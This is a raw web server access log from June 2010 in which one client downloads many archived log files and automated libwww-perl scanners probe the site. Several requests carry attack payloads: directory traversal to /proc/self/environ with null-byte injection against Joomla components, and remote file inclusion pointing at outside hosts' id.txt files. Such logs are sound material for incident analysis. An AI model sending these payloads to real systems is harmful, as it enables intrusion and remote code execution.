178.63.49.141 - - [21/Jun/2010:01:46:37 -0400] "GET /logs/access_log.Q109073100 HTTP/1.1" 200 3531011 "http://www.aceonlinestore.com/logs/access_log.Q109073100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:46:37 -0400] "GET /logs/access_log.Q109073000 HTTP/1.1" 200 4555164 "http://www.aceonlinestore.com/logs/access_log.Q109073000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:46:37 -0400] "GET /logs/access_log.Q109080500 HTTP/1.1" 200 3793390 "http://www.aceonlinestore.com/logs/access_log.Q109080500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:46:37 -0400] "GET /logs/access_log.Q109080300 HTTP/1.1" 200 4623136 "http://www.aceonlinestore.com/logs/access_log.Q109080300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:46:37 -0400] "GET /logs/access_log.Q109080100 HTTP/1.1" 200 1996380 "http://www.aceonlinestore.com/logs/access_log.Q109080100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:46:37 -0400] "GET /logs/access_log.Q109080200 HTTP/1.1" 200 2084930 "http://www.aceonlinestore.com/logs/access_log.Q109080200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:46:37 -0400] "GET /logs/access_log.Q109072900 HTTP/1.1" 200 4189147 "http://www.aceonlinestore.com/logs/access_log.Q109072900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:46:37 -0400] "GET /logs/access_log.Q109072800 HTTP/1.1" 200 4911230 "http://www.aceonlinestore.com/logs/access_log.Q109072800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:46:37 -0400] "GET /logs/access_log.Q109072700 HTTP/1.1" 200 4190321 "http://www.aceonlinestore.com/logs/access_log.Q109072700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:46:37 -0400] "GET /logs/access_log.Q109080400 HTTP/1.1" 200 4786327 "http://www.aceonlinestore.com/logs/access_log.Q109080400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
174.121.176.46 - - [21/Jun/2010:01:47:38 -0400] "GET /logs/access_log.Q109120200/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
194.108.112.112 - - [21/Jun/2010:01:47:47 -0400] "GET /logs/access_log.Q109061700//adxmlrpc.php HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
62.44.82.118 - - [21/Jun/2010:01:47:47 -0400] "GET /logs/error_log.Q110061700//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
194.108.112.112 - - [21/Jun/2010:01:47:48 -0400] "GET //adxmlrpc.php HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
62.44.82.118 - - [21/Jun/2010:01:47:48 -0400] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
62.44.82.118 - - [21/Jun/2010:01:47:48 -0400] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
194.108.112.112 - - [21/Jun/2010:01:47:48 -0400] "GET /logs//adxmlrpc.php HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
62.44.82.118 - - [21/Jun/2010:01:47:52 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
178.63.49.141 - - [21/Jun/2010:01:47:38 -0400] "GET /logs/access_log.Q109080100 HTTP/1.1" 200 1996380 "http://www.aceonlinestore.com/logs/access_log.Q109080100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:47:38 -0400] "GET /logs/access_log.Q109080200 HTTP/1.1" 200 2084930 "http://www.aceonlinestore.com/logs/access_log.Q109080200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
203.120.246.20 - - [21/Jun/2010:01:48:02 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
213.171.37.206 - - [21/Jun/2010:01:48:18 -0400] "GET /logs/error_log.Q110050400%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.808"
186.28.232.13 - - [21/Jun/2010:01:48:54 -0400] "GET /logs/access_log.Q109122800///?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
186.28.232.13 - - [21/Jun/2010:01:48:54 -0400] "GET ///?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
186.28.232.13 - - [21/Jun/2010:01:48:55 -0400] "GET /logs///?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 200 55292 "-" "libwww-perl/5.805"
203.211.149.167 - - [21/Jun/2010:01:48:56 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:48:56 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:48:57 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
178.63.49.141 - - [21/Jun/2010:01:48:02 -0400] "GET /logs/access_log.Q109081300 HTTP/1.1" 200 5011500 "http://www.aceonlinestore.com/logs/access_log.Q109081300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:48:02 -0400] "GET /logs/access_log.Q109080700 HTTP/1.1" 200 3796760 "http://www.aceonlinestore.com/logs/access_log.Q109080700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:48:02 -0400] "GET /logs/access_log.Q109080800 HTTP/1.1" 200 2589826 "http://www.aceonlinestore.com/logs/access_log.Q109080800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:48:02 -0400] "GET /logs/access_log.Q109081100 HTTP/1.1" 200 5268662 "http://www.aceonlinestore.com/logs/access_log.Q109081100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:48:02 -0400] "GET /logs/access_log.Q109081500 HTTP/1.1" 200 3060423 "http://www.aceonlinestore.com/logs/access_log.Q109081500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:48:02 -0400] "GET /logs/access_log.Q109080600 HTTP/1.1" 200 5127305 "http://www.aceonlinestore.com/logs/access_log.Q109080600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:48:02 -0400] "GET /logs/access_log.Q109081400 HTTP/1.1" 200 5006864 "http://www.aceonlinestore.com/logs/access_log.Q109081400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:48:02 -0400] "GET /logs/access_log.Q109080900 HTTP/1.1" 200 2146806 "http://www.aceonlinestore.com/logs/access_log.Q109080900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:48:02 -0400] "GET /logs/access_log.Q109081200 HTTP/1.1" 200 4716643 "http://www.aceonlinestore.com/logs/access_log.Q109081200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:48:02 -0400] "GET /logs/access_log.Q109081000 HTTP/1.1" 200 5307504 "http://www.aceonlinestore.com/logs/access_log.Q109081000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
201.36.173.93 - - [21/Jun/2010:01:49:09 -0400] "GET /logs/access_log.Q110061100/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
201.36.173.93 - - [21/Jun/2010:01:49:09 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
201.36.173.93 - - [21/Jun/2010:01:49:10 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:49:31 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
178.63.49.141 - - [21/Jun/2010:01:49:02 -0400] "GET /logs/access_log.Q109082000 HTTP/1.1" 200 6174306 "http://www.aceonlinestore.com/logs/access_log.Q109082000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:49:02 -0400] "GET /logs/access_log.Q109081600 HTTP/1.1" 200 3536999 "http://www.aceonlinestore.com/logs/access_log.Q109081600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:49:02 -0400] "GET /logs/access_log.Q109081800 HTTP/1.1" 200 5710162 "http://www.aceonlinestore.com/logs/access_log.Q109081800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:49:02 -0400] "GET /logs/access_log.Q109082400 HTTP/1.1" 200 5108182 "http://www.aceonlinestore.com/logs/access_log.Q109082400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:49:02 -0400] "GET /logs/access_log.Q109082300 HTTP/1.1" 200 2549877 "http://www.aceonlinestore.com/logs/access_log.Q109082300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:49:02 -0400] "GET /logs/access_log.Q109082500 HTTP/1.1" 200 6226032 "http://www.aceonlinestore.com/logs/access_log.Q109082500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:49:02 -0400] "GET /logs/access_log.Q109081700 HTTP/1.1" 200 5323695 "http://www.aceonlinestore.com/logs/access_log.Q109081700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:49:02 -0400] "GET /logs/access_log.Q109082100 HTTP/1.1" 200 4228229 "http://www.aceonlinestore.com/logs/access_log.Q109082100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:49:02 -0400] "GET /logs/access_log.Q109081900 HTTP/1.1" 200 4260094 "http://www.aceonlinestore.com/logs/access_log.Q109081900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:49:02 -0400] "GET /logs/access_log.Q109082200 HTTP/1.1" 200 2103181 "http://www.aceonlinestore.com/logs/access_log.Q109082200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
216.17.105.143 - - [21/Jun/2010:01:50:09 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
194.108.112.112 - - [21/Jun/2010:01:50:30 -0400] "GET /logs/access_log.Q109061700//adxmlrpc.php HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
82.76.12.197 - - [21/Jun/2010:01:50:30 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
194.108.112.112 - - [21/Jun/2010:01:50:30 -0400] "GET //adxmlrpc.php HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
194.108.112.112 - - [21/Jun/2010:01:50:30 -0400] "GET /logs//adxmlrpc.php HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
194.108.112.112 - - [21/Jun/2010:01:50:32 -0400] "GET /logs/error_log.Q109061700//adxmlrpc.php HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
98.236.38.191 - - [21/Jun/2010:01:50:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; InfoPath.2; .NET CLR 3.0.30729)"
98.236.38.191 - - [21/Jun/2010:01:50:44 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; InfoPath.2; .NET CLR 3.0.30729)"
98.236.38.191 - - [21/Jun/2010:01:50:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; InfoPath.2; .NET CLR 3.0.30729)"
98.236.38.191 - - [21/Jun/2010:01:50:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; InfoPath.2; .NET CLR 3.0.30729)"
178.63.49.141 - - [21/Jun/2010:01:50:03 -0400] "GET /logs/access_log.Q109090300 HTTP/1.1" 200 5190518 "http://www.aceonlinestore.com/logs/access_log.Q109090300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:50:02 -0400] "GET /logs/access_log.Q109083000 HTTP/1.1" 200 2261619 "http://www.aceonlinestore.com/logs/access_log.Q109083000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:50:02 -0400] "GET /logs/access_log.Q109082600 HTTP/1.1" 200 5029665 "http://www.aceonlinestore.com/logs/access_log.Q109082600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:50:02 -0400] "GET /logs/access_log.Q109082700 HTTP/1.1" 200 4307776 "http://www.aceonlinestore.com/logs/access_log.Q109082700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:50:03 -0400] "GET /logs/access_log.Q109090100 HTTP/1.1" 200 5423123 "http://www.aceonlinestore.com/logs/access_log.Q109090100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:50:02 -0400] "GET /logs/access_log.Q109090200 HTTP/1.1" 200 4613673 "http://www.aceonlinestore.com/logs/access_log.Q109090200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:50:02 -0400] "GET /logs/access_log.Q109082800 HTTP/1.1" 200 4649792 "http://www.aceonlinestore.com/logs/access_log.Q109082800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:50:03 -0400] "GET /logs/access_log.Q109083100 HTTP/1.1" 200 4870488 "http://www.aceonlinestore.com/logs/access_log.Q109083100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:50:02 -0400] "GET /logs/access_log.Q109082900 HTTP/1.1" 200 2500375 "http://www.aceonlinestore.com/logs/access_log.Q109082900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:50:02 -0400] "GET /logs/access_log.Q109090400 HTTP/1.1" 200 3702764 "http://www.aceonlinestore.com/logs/access_log.Q109090400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
91.142.214.148 - - [21/Jun/2010:01:51:59 -0400] "GET /logs/access_log.Q109120200///?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
194.108.112.112 - - [21/Jun/2010:01:52:00 -0400] "GET /logs/error_log.Q109061700//adxmlrpc.php HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
178.63.49.141 - - [21/Jun/2010:01:51:03 -0400] "GET /logs/access_log.Q109090800 HTTP/1.1" 200 5714765 "http://www.aceonlinestore.com/logs/access_log.Q109090800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:51:03 -0400] "GET /logs/access_log.Q109090500 HTTP/1.1" 200 2649332 "http://www.aceonlinestore.com/logs/access_log.Q109090500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:51:03 -0400] "GET /logs/access_log.Q109091000 HTTP/1.1" 200 4894643 "http://www.aceonlinestore.com/logs/access_log.Q109091000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:51:03 -0400] "GET /logs/access_log.Q109090600 HTTP/1.1" 200 2504510 "http://www.aceonlinestore.com/logs/access_log.Q109090600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:51:03 -0400] "GET /logs/access_log.Q109090700 HTTP/1.1" 200 2369217 "http://www.aceonlinestore.com/logs/access_log.Q109090700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:51:03 -0400] "GET /logs/access_log.Q109091400 HTTP/1.1" 200 5910903 "http://www.aceonlinestore.com/logs/access_log.Q109091400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:51:03 -0400] "GET /logs/access_log.Q109091300 HTTP/1.1" 200 2663486 "http://www.aceonlinestore.com/logs/access_log.Q109091300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:51:03 -0400] "GET /logs/access_log.Q109090900 HTTP/1.1" 200 4982574 "http://www.aceonlinestore.com/logs/access_log.Q109090900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:51:03 -0400] "GET /logs/access_log.Q109091100 HTTP/1.1" 200 4800132 "http://www.aceonlinestore.com/logs/access_log.Q109091100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:51:03 -0400] "GET /logs/access_log.Q109091200 HTTP/1.1" 200 2862401 "http://www.aceonlinestore.com/logs/access_log.Q109091200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
82.39.188.43 - - [21/Jun/2010:01:52:12 -0400] "GET /logs/access_log.Q109061700//adxmlrpc.php HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
82.39.188.43 - - [21/Jun/2010:01:52:12 -0400] "GET //adxmlrpc.php HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
82.39.188.43 - - [21/Jun/2010:01:52:13 -0400] "GET /logs//adxmlrpc.php HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
186.28.232.13 - - [21/Jun/2010:01:52:24 -0400] "GET /logs/access_log.Q109120200///?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
82.76.12.197 - - [21/Jun/2010:01:52:42 -0400] "GET /logs/access_log.Q110061500/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:52:42 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:52:43 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:52:55 -0400] "GET /logs/error_log.Q110061500/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.831"
178.63.49.141 - - [21/Jun/2010:01:52:03 -0400] "GET /logs/access_log.Q109092200 HTTP/1.1" 200 4617999 "http://www.aceonlinestore.com/logs/access_log.Q109092200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:52:03 -0400] "GET /logs/access_log.Q109091700 HTTP/1.1" 200 6031717 "http://www.aceonlinestore.com/logs/access_log.Q109091700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:52:03 -0400] "GET /logs/access_log.Q109092100 HTTP/1.1" 200 5859236 "http://www.aceonlinestore.com/logs/access_log.Q109092100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:52:04 -0400] "GET /logs/access_log.Q109092400 HTTP/1.1" 200 7812198 "http://www.aceonlinestore.com/logs/access_log.Q109092400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:52:04 -0400] "GET /logs/access_log.Q109092300 HTTP/1.1" 200 4785535 "http://www.aceonlinestore.com/logs/access_log.Q109092300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:52:03 -0400] "GET /logs/access_log.Q109091600 HTTP/1.1" 200 5618969 "http://www.aceonlinestore.com/logs/access_log.Q109091600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:52:03 -0400] "GET /logs/access_log.Q109091500 HTTP/1.1" 200 4009718 "http://www.aceonlinestore.com/logs/access_log.Q109091500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:52:03 -0400] "GET /logs/access_log.Q109091900 HTTP/1.1" 200 2173992 "http://www.aceonlinestore.com/logs/access_log.Q109091900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:52:03 -0400] "GET /logs/access_log.Q109092000 HTTP/1.1" 200 2173792 "http://www.aceonlinestore.com/logs/access_log.Q109092000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:52:03 -0400] "GET /logs/access_log.Q109091800 HTTP/1.1" 200 4296895 "http://www.aceonlinestore.com/logs/access_log.Q109091800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
163.20.26.5 - - [21/Jun/2010:01:53:11 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
82.39.188.43 - - [21/Jun/2010:01:53:13 -0400] "GET /logs/access_log.Q109082100//adxmlrpc.php HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
163.20.26.5 - - [21/Jun/2010:01:53:14 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:01:53:42 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:01:53:43 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
66.249.71.206 - - [21/Jun/2010:01:53:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L11516E5700F16500152B093+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.63.49.141 - - [21/Jun/2010:01:53:04 -0400] "GET /logs/access_log.Q109092600 HTTP/1.1" 200 2627660 "http://www.aceonlinestore.com/logs/access_log.Q109092600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:53:04 -0400] "GET /logs/access_log.Q109093000 HTTP/1.1" 200 6277446 "http://www.aceonlinestore.com/logs/access_log.Q109093000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:53:04 -0400] "GET /logs/access_log.Q109100200 HTTP/1.1" 200 4328684 "http://www.aceonlinestore.com/logs/access_log.Q109100200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:53:04 -0400] "GET /logs/access_log.Q109092800 HTTP/1.1" 200 5369029 "http://www.aceonlinestore.com/logs/access_log.Q109092800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:53:04 -0400] "GET /logs/access_log.Q109092700 HTTP/1.1" 200 2319914 "http://www.aceonlinestore.com/logs/access_log.Q109092700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
